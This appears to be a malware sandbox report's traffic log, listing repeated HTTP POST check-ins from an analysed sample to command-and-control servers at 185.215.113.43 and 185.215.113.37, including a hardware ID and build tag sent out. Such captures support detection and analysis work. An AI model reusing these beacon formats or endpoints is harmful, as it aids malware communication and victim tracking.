Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 31 32 46 37 30 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B12F70B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E8
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGIJKJJKEBGHJKFIDGCHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 30 33 35 38 30 32 39 32 37 37 32 32 35 38 33 35 38 30 30 35 38 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 2d 2d 0d 0a Data Ascii: ------FCGIJKJJKEBGHJKFIDGCContent-Disposition: form-data; name="hwid"5035802927722583580058------FCGIJKJJKEBGHJKFIDGCContent-Disposition: form-data; name="build"doma------FCGIJKJJKEBGHJKFIDGC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 31 32 46 37 30 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B12F70B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E8
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 31 32 46 37 30 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B12F70B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E8
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCBGCAFIIECBFIDHIJKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 30 33 35 38 30 32 39 32 37 37 32 32 35 38 33 35 38 30 30 35 38 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 2d 2d 0d 0a Data Ascii: ------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="hwid"5035802927722583580058------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="build"doma------BGCBGCAFIIECBFIDHIJK--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 31 32 46 37 30 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B12F70B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E8
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 31 32 46 37 30 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B12F70B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E8
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 31 32 46 37 30 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B12F70B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E8
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 31 32 46 37 30 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B12F70B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E8
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 31 32 46 37 30 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B12F70B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E8
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 31 32 46 37 30 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B12F70B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E8
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 31 32 46 37 30 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B12F70B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E8
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 31 32 46 37 30 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B12F70B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E8
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 31 32 46 37 30 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B12F70B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E8
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 31 32 46 37 30 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B12F70B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E8
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 31 32 46 37 30 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B12F70B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E8
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 31 32 46 37 30 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B12F70B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E8
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 31 32 46 37 30 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B12F70B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E8
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 31 32 46 37 30 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B12F70B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E8
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 31 32 46 37 30 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B12F70B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E8
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 31 32 46 37 30 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B12F70B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E8
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 31 32 46 37 30 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B12F70B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E8
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 31 32 46 37 30 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B12F70B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E8
